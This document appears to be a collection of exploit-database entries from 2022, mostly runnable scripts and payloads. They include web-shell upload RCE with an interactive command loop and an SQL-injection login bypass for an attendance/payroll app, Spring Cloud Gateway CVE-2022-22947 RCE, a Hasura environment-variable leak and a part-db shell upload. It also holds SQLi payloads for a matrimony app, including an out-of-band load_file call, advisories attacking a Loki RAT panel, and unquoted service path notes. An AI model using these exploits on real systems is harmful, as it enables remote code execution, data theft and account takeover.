<pre><code># Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE)<br /># Date: 04/03/2022<br /># Exploit Author: pr0z<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip<br /># Version: v1.0<br /># Tested on: Linux, MySQL, Apache<br /><br />import requests<br />import sys<br />from requests.exceptions import ConnectionError<br /><br /># Interface class to display terminal messages<br />class Interface():<br /> def __init__(self):<br /> self.red = '\033[91m'<br /> self.green = '\033[92m'<br /> self.white = '\033[37m'<br /> self.yellow = '\033[93m'<br /> self.bold = '\033[1m'<br /> self.end = '\033[0m'<br /><br /> def header(self):<br /> print('\n >> Attendance and Payroll System v1.0')<br /> print(' >> Unauthenticated Remote Code Execution')<br /> print(' >> By pr0z\n')<br /><br /> def info(self, message):<br /> print(f"[{self.white}*{self.end}] {message}")<br /><br /> def warning(self, message):<br /> print(f"[{self.yellow}!{self.end}] {message}")<br /><br /> def error(self, message):<br /> print(f"[{self.red}x{self.end}] {message}")<br /><br /> def success(self, message):<br /> print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")<br /><br /><br />upload_path = '/apsystem/admin/employee_edit_photo.php'<br />shell_path = '/apsystem/images/shell.php'<br />#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br />shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>"<br /><br />multipart_form_data = {<br /> 'id': 1,<br /> 'upload': (''),<br />}<br /><br />files = {'photo': ('shell.php', shell_data)}<br /><br />output = Interface()<br />output.header()<br /><br /># Check for arguments<br />if len(sys.argv) < 2 or '-h' in sys.argv:<br /> output.info("Usage: python3 rce.py http://127.0.0.1")<br /> sys.exit()<br /><br /># Upload the shell<br />target = sys.argv[1]<br />output.info(f"Uploading the web shell to {target}")<br />r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)<br /><br /># Validating shell has been uploaded<br />output.info(f"Validating the shell has been uploaded to {target}")<br />r = requests.get(target + shell_path, verify=False)<br />try:<br /> r = requests.get(target + shell_path)<br /> if r.status_code == 200:<br /> output.success('Successfully connected to web shell\n')<br /> else:<br /> raise Exception<br />except ConnectionError:<br /> output.error('We were unable to establish a connection')<br /> sys.exit()<br />except:<br /> output.error('Something unexpected happened')<br /> sys.exit()<br /><br /># Remote code execution<br />while True:<br /> try:<br /> cmd = input("\033[91mRCE\033[0m > ")<br /> if cmd == 'exit':<br /> raise KeyboardInterrupt<br /> r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False)<br /> if r.status_code == 200:<br /> print(r.text)<br /> else:<br /> raise Exception<br /> except KeyboardInterrupt:<br /> sys.exit()<br /> except ConnectionError:<br /> output.error('We lost our connection to the web shell')<br /> sys.exit()<br /> except:<br /> output.error('Something unexpected happened')<br /> sys.exit()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass<br /># Date: 04/03/2022<br /># Exploit Author: pr0z<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip<br /># Version: v1.0<br /># Tested on: Linux, MySQL, Apache<br /><br />import requests<br />import sys<br />from requests.exceptions import ConnectionError<br /><br /><br />print('\n >> Attendance and Payroll System v1.0')<br />print(' >> Authentication Bypass through SQL injection')<br />print(' >> By pr0z\n')<br /><br />login_path = '/apsystem/admin/login.php'<br />index_path = '/apsystem/admin/index.php'<br /><br />payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="<br />headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br />#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br /><br /># Check for arguments<br />if len(sys.argv) < 2 or '-h' in sys.argv:<br /> print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")<br /> sys.exit()<br /><br /># Bypass Authentication<br />target = sys.argv[1]<br />print("[+] Extracting Administrator cookie using SQLi ...")<br />sess = requests.Session()<br />try:<br /> sess.get(target + index_path,headers=headers, verify=False)<br /> sess.post(target + login_path, data=payload, headers=headers,verify=False)<br />except ConnectionError:<br /> print('[-] We were unable to establish a connection')<br /> sys.exit()<br /><br />cookie_val = sess.cookies.get_dict().get("PHPSESSID")<br /><br />print("[+] Use the following cookie:\n")<br />print(f"PHPSESSID: {cookie_val}")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure<br /># Software: Hasura GraphQL Community<br /># Software Link: https://github.com/hasura/graphql-engine<br /># Version: 2.2.0<br /># Exploit Author: Dolev Farhi<br /># Date: 5/05/2022<br /># Tested on: Ubuntu<br /><br />import requests<br /><br />SERVER_ADDR = 'x.x.x.x'<br /><br />url = 'http://{}/v1/metadata'.format(SERVER_ADDR)<br /><br />print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')<br /><br />while True:<br /> env_var = input('Type environment variable key to leak.\n> ')<br /> if not env_var:<br /> continue<br /><br /> payload = {<br /> "type": "bulk",<br /> "source": "",<br /> "args": [<br /> {<br /> "type": "add_remote_schema",<br /> "args": {<br /> "name": "ttt",<br /> "definition": {<br /> "timeout_seconds": 60,<br /> "forward_client_headers": False,<br /> "headers": [],<br /> "url_from_env": env_var<br /> },<br /> "comment": ""<br /> }<br /> }<br /> ],<br /> "resource_version": 2<br />}<br /> r = requests.post(url, json=payload)<br /> try:<br /> print(r.json()['error'].split('not a valid URI:')[1])<br /> except IndexError:<br /> print('Could not parse out VAR, dumping error as is')<br /> print(r.json().get('error', 'N/A'))<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 03/03/2022<br /># Exploit Author: Carlos E. Vieira<br /># Vendor Homepage: https://spring.io/<br /># Software Link: https://spring.io/projects/spring-cloud-gateway<br /># Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1<br /># Tested on: 3.1.0<br /># CVE : CVE-2022-22947<br /><br />import random<br />import string<br />import requests<br />import json<br />import sys<br />import urllib.parse<br />import base64<br /><br />headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}<br />proxies = {<br /> 'http': 'http://172.29.32.1:8081',<br /> 'https': 'http://172.29.32.1:8081',<br />}<br />id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))<br /><br />def exploit(url, command):<br /> <br /> payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}<br /> <br /> commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')<br /><br /> rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)<br /> if(rbase.status_code == 201):<br /> print("[+] Stage deployed to /actuator/gateway/routes/"+id)<br /> print("[+] Executing command...")<br /> r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)<br /> if(r.status_code == 200):<br /> print("[+] getting result...")<br /> r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)<br /> if(r.status_code == 200):<br /> get_response = r.json()<br /> clean(url, id)<br /> return get_response['filters'][0].split("'")[1]<br /> else:<br /> print("[-] Error: Invalid response")<br /> clean(url, id)<br /> exit(1)<br /> else:<br /> clean(url, id)<br /> print("[-] Error executing command")<br /><br /> <br />def clean(url, id):<br /> remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)<br /> if(remove.status_code == 200):<br /> print("[+] Stage removed!")<br /> else:<br /> print("[-] Error: Fail to remove stage")<br /><br />def banner():<br /> print("""<br /> ###################################################<br /> # #<br /> # Exploit for CVE-2022-22947 #<br /> # - Carlos Vieira (Crowsec) #<br /> # #<br /> # Usage: #<br /> # python3 exploit.py <url> <command> #<br /> # #<br /> # Example: #<br /> # python3 exploit.py http://localhost:8080 'id' #<br /> # #<br /> ###################################################<br /> """)<br /><br />def main():<br /> banner()<br /> if len(sys.argv) != 3:<br /> print("[-] Error: Invalid arguments")<br /> print("[-] Usage: python3 exploit.py <url> <command>")<br /> exit(1)<br /> else:<br /> url = sys.argv[1]<br /> command = sys.argv[2]<br /> print(exploit(url, command))<br />if __name__ == '__main__':<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)<br /># Google Dork: NA<br /># Date: 03/04/2022<br /># Exploit Author: Sunny Mehra @DSKMehra<br /># Vendor Homepage: https://github.com/part-db/part-db<br /># Software Link: https://github.com/part-db/part-db<br /># Version: [ 0.5.11.] <br /># Tested on: [KALI OS]<br /># CVE : CVE-2022-0848<br />#<br />---------------<br /><br />#!/bin/bash<br />host=127.0.0.1/Part-DB-0.5.10 #WEBHOST<br />#Usage: Change host <br />#Command: bash exploit.sh<br />#EXPLOIT BY @DSKMehra<br />echo "<?php system(id); ?>">POC.phtml #PHP Shell Code<br />result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`<br />rm POC.phtml<br />echo Shell Location : "$host/data/media/labels/$result"<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/aabb54951546132e70a8e9f02bf8b5ba_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Loki RAT (Relapse)<br />Vulnerability: SQL Injection<br />Description: The LokiRAT WebUI panel for LokiRAT_Relapse.exe runs on PHP and MySQL and is used to control infected hosts through a central server.<br />The backend server side code "admin.php" does not use any secure coding practices nor does it sanitize or filter user input when constructing MySQL statements. <br /><br />Loki admin.php takes four parameter's pass, command, id and type. There's an auth check using $_GET['pass'] against the clear-text password "test" in settings.php.<br /><br />The $_GET['id'] parameter is used directly in SELECT * FROM vircom WHERE id='$id' statement used in mysql_query() func, making it vulnerable to post-auth SQL Injection.<br />Authenticated users or third-party attackers who can guess the password can easily dump all databases, tables and contents including the MySQL database schema.<br /><br />admin.php snippet:<br /><br />if ($_GET['pass'] == $password) {<br /> $command = $_REQUEST['command'];<br /> $id = $_GET['id'];<br /> $type = $_GET['type'];<br /> ....<br /><br /> case "response":<br /> $query = mysql_query("SELECT * FROM vircom WHERE id='$id'");<br /> $row = mysql_fetch_array($query);<br /> echo $row['retCommandNum'] . "{-}" . $row['retCommand'] . "{-}" . $row['lastUpdate'] . "{-}" . $row['updateInterval'];<br /> break;<br /><br />Family: Loki<br />Type: WebUI<br />MD5: aabb54951546132e70a8e9f02bf8b5ba<br />MD5: 16c33e28c8c9b3ea71249ad94be4bf94 (admin.php)<br />Vuln ID: MVID-2022-0510<br />Disclosure: 03/05/2022<br /><br />Exploit/PoC:<br />sqlmap.py -u "http://LOKI-RAT-IP/PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=response" --dbms=MySQL --risk=3 --level=5 --dump<br /><br />[21:06:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable<br />GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 11385 HTTP(s) requests:<br />...<br /><br />back-end DBMS: MySQL >= 5.0.12<br />[21:06:57] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries<br />[21:06:57] [INFO] fetching current database<br />[21:06:57] [INFO] fetching tables for database: 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 2 entries<br />[21:06:57] [INFO] retrieved: klcom<br />[21:06:57] [INFO] retrieved: vircom<br />[21:06:57] [INFO] fetching columns for table 'vircom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 13 entries<br />[21:06:57] [INFO] retrieved: "id","varchar(12)"<br />[21:06:57] [INFO] retrieved: "ipAddress","varchar(15)"<br />[21:06:57] [INFO] retrieved: "location","varchar(255)"<br />[21:06:57] [INFO] retrieved: "compName","varchar(30)"<br />[21:06:57] [INFO] retrieved: "operatingSystem","varchar(100)"<br />[21:06:57] [INFO] retrieved: "command","text"<br />[21:06:57] [INFO] retrieved: "retCommand","text"<br />[21:06:57] [INFO] retrieved: "retCommandNum","int(11)"<br />[21:06:57] [INFO] retrieved: "lastUpdate","datetime"<br />[21:06:57] [INFO] retrieved: "updateInterval","int(9)"<br />[21:06:57] [INFO] retrieved: "ramMemory","varchar(50)"<br />[21:06:57] [INFO] retrieved: "processor","varchar(255)"<br />[21:06:57] [INFO] retrieved: "webcam","int(1)"<br />[21:06:57] [INFO] fetching entries for table 'vircom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 1 entries<br />[21:06:57] [INFO] analyzing table dump for possible password hashes<br />Database: lokirat2<br />Table: vircom<br />[1 entry]<br />+----+--------+---------+----------+--------------+-----------+-----------+-----------+---------------------+------------+---------------+----------------+-----------------+<br />| id | webcam | command | compName | location | processor | ramMemory | ipAddress | lastUpdate | retCommand | retCommandNum | updateInterval | operatingSystem |<br />+----+--------+---------+----------+--------------+-----------+-----------+-----------+---------------------+------------+---------------+----------------+-----------------+<br />| 1 | 1 | melt | Hate | New York USA | Intel64 | 15gb | 10.2.1.3 | 2022-03-05 02:43:34 | doit | 666 | 0 | Windows |<br />+----+--------+---------+----------+--------------+-----------+-----------+-----------+---------------------+------------+---------------+----------------+-----------------+<br /><br />[21:06:57] [INFO] table 'lokirat2.vircom' dumped to CSV file 'C:\Users\Victim\.sqlmap\output\127.0.0.1\dump\lokirat2\vircom.csv'<br />[21:06:57] [INFO] fetching columns for table 'klcom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 3 entries<br />[21:06:57] [INFO] retrieved: "id","varchar(15)"<br />[21:06:57] [INFO] retrieved: "kldata","text"<br />[21:06:57] [INFO] retrieved: "dateTime","datetime"<br />[21:06:57] [INFO] fetching entries for table 'klcom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 1 entries<br />[21:06:57] [INFO] analyzing table dump for possible password hashes<br />Database: lokirat2<br />Table: klcom<br />[1 entry]<br />+----+----------------+---------------------+<br />| id | kldata | dateTime |<br />+----+----------------+---------------------+<br />| 1 | KILL PUTIN | 2022-03-05 02:42:59 |<br />+----+----------------+---------------------+<br /><br />[21:06:57] [INFO] table 'lokirat2.klcom' dumped to CSV file 'C:\Users\Victim\.sqlmap\output\127.0.0.1\dump\lokirat2\klcom.csv'<br />[21:06:57] [INFO] fetched data logged to text files under 'C:\Users\Victim\.sqlmap\output\127.0.0.1'<br /><br />[*] shutting down at 21:06:57<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path<br /># Date: 04/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.privateinternetaccess.com<br /># Software Link: https://www.privateinternetaccess.com/download<br /># Version: 3.3.0.100<br /># Tested: Windows 10 x64<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname<br /><br />DisplayName Name PathName StartMode StartName<br />Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem<br /><br /># Service info:<br /><br />C:\Users\saudh>sc qc PrivateInternetAccessService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: PrivateInternetAccessService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Private Internet Access Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/aabb54951546132e70a8e9f02bf8b5ba.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Loki RAT (Relapse)<br />Vulnerability: Directory Traversal - Arbitrary File Delete<br />Description: The LokiRAT WebUI panel for "LokiRAT_Relapse.exe" runs on PHP and MySQL and is used control infected hosts through a central server.<br />The admin webpage "admin.php" takes four parameters pass, command, id and type. Theres a single check to authenticate $_GET['pass'] against a hardcoded clear-text password in settings.php.<br /><br />The backend "admin.php" code has an upload feature, it uses PHP "unlink" function to delete a file before moving the new one. However, the code does not<br />use any secure coding practices, sanitize or filter user input for directory traversal characters "/../". This can allow authenticated users, compromised bots or third-party attackers<br />who can guess the password check, ability to delete any file E.g. ".php", ".htaccess" etc in the root panel outside the "uploads/" dir, causing Loki web panel to become inoperative.<br /><br />admin.php snippet:<br /><br /> case "upload":<br /> $fullfilename = "uploads/" . $_GET['filename'];<br /> if (file_exists($fullfilename)) unlink ($fullfilename);<br /> move_uploaded_file($_FILES['file']['tmp_name'], $fullfilename);<br /><br />Family: Loki<br />Type: WebUI<br />MD5: aabb54951546132e70a8e9f02bf8b5ba<br />MD5: 16c33e28c8c9b3ea71249ad94be4bf94 (admin.php)<br />Vuln ID: MVID-2022-0509<br />Disclosure: 03/05/2022<br /><br />Exploit/PoC:<br />delete "settings.php" file which holds database connection, rendering the backend inoperative.<br /><br />http://LOKI-RAT-IP/PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=upload&filename=/../settings.php<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Matrimony 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.05.2022<br />## Vendor: https://www.vetbossel.in/matrimony-project-php/<br />## Software: https://cutt.ly/LOHzKd0,<br />https://www.vetbossel.in/matrimony-project-php/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/vetbossel.in/2022/Matrimony<br /><br />## Description:<br />The password parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'<br />was submitted in the password parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control and also of all<br />accounts on this system,<br />also the malicious user can download all information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: username=-5824' OR 4197=4197--<br />jrsh&password=i0C!o0b!U4'+(select<br />load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log<br />in<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=VbMOEEMf' AND (SELECT 2589 FROM(SELECT<br />COUNT(*),CONCAT(0x7178706b71,(SELECT<br />(ELT(2589=2589,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--<br />gXFR&password=i0C!o0b!U4'+(select<br />load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log<br />in<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=VbMOEEMf' AND (SELECT 4030 FROM<br />(SELECT(SLEEP(5)))ciQI)-- nHot&password=i0C!o0b!U4'+(select<br />load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log<br />in<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 1 column<br /> Payload: username=-4629' UNION ALL SELECT<br />CONCAT(0x7178706b71,0x505747504a524d546e7842785156787361686c546c6e695873646952794a545770586447467a4d6b,0x71706a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br />-&password=i0C!o0b!U4'+(select<br />load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log<br />in<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/vetbossel.in/2022/Matrimony)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/7gggih)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path<br /># Date: 05/03/2022<br /># Exploit Author: Hejap Zairy<br /># Vendor Homepage: https://www.cloudflare.com/<br /># Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/<br /># Version: 1.4.107<br /># Tested: Windows 10 Pro x64 es<br /><br />C:\Users\Hejap>sc qc CloudflareWARP<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: CloudflareWARP<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Cloudflare WARP<br /> DEPENDENCIES : wlansvc<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
